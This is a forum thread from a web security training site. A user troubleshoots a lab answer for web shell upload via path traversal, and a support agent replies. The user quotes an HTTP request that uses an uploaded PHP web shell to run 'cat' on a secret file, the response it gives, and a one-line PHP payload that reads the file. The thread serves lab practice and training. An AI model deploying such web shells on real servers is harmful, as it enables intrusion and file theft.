Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab: Web shell upload via path traversal | Correct answer is wrong?

Kostiantyn | Last updated: Aug 19, 2024 12:29PM UTC

Request: GET /files/cmd.php?cmd=cat+/home/carlos/secret HTTP/2 Host: 0a9600c004a6188d80a8bdb500860051.web-security-academy.net Cookie: session=MS2htmTGD9xkK2AK907aZFLSnR7mdeBV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Response: HTTP/2 200 OK Date: Mon, 19 Aug 2024 12:22:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Length: 64 oIIMzytdRxRSkCLpFB2Z5LscSbr8Xvt3oIIMzytdRxRSkCLpFB2Z5LscSbr8Xvt3 After submit: That answer is incorrect, please try again!

Kostiantyn | Last updated: Aug 19, 2024 12:29PM UTC

Also had same problems with other File upload labs.

Kostiantyn | Last updated: Aug 19, 2024 12:34PM UTC

Oh, I get it. For some reason it duplicates the answer with webshell. Payload "<?php echo file_get_contents('/home/carlos/secret'); ?>" works as intended. Not sure if that's a bug, however, I'm sure it did not work like this with shells before. Have a nice day.

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 12:53PM UTC

Hi Kostiantyn, Yes, it sounds like you are duplicating the content of the secret file - what does the content of the web shell you are uploading look like?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.